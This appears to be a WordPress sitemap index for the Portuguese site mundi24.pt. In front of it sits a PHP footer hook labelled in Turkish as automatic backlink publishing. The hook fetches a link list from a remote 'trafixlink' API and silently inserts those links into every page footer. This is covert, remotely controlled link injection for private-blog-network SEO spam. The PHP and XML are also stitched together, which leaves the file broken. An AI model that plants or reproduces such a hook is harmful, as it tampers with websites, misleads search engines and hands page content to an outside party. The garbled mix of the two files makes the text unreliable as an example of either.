
// PBN Market - otomatik backlink yayini
add_action('wp_footer', function () {
    $api = 'https://trafixlink.com/api/links/3KNNzD-H021J9tom29YU7w';
    $response = wp_remote_get($api, ['timeout' => 5]);
    if (is_wp_error($response)) return;
    $data = json_decode(wp_remote_retrieve_body($response), true);
    if (empty($data['links'])) return;
    echo "<div class='pbn-links'><ul>";
    foreach ($data['links'] as $l) {
        $url    = esc_url($l['url']);
        $anchor = esc_html($l['anchor']);
        $rel    = esc_attr($l['rel']);
        echo "<li><a href='{$url}' rel='{$rel}'>{$anchor}</a></li>";
    }
    echo "</ul></div>";
});
<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://mundi24.pt/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://mundi24.pt/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://mundi24.pt/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://mundi24.pt/wp-sitemap-posts-elementor-hf-1.xml</loc></sitemap><sitemap><loc>https://mundi24.pt/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://mundi24.pt/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
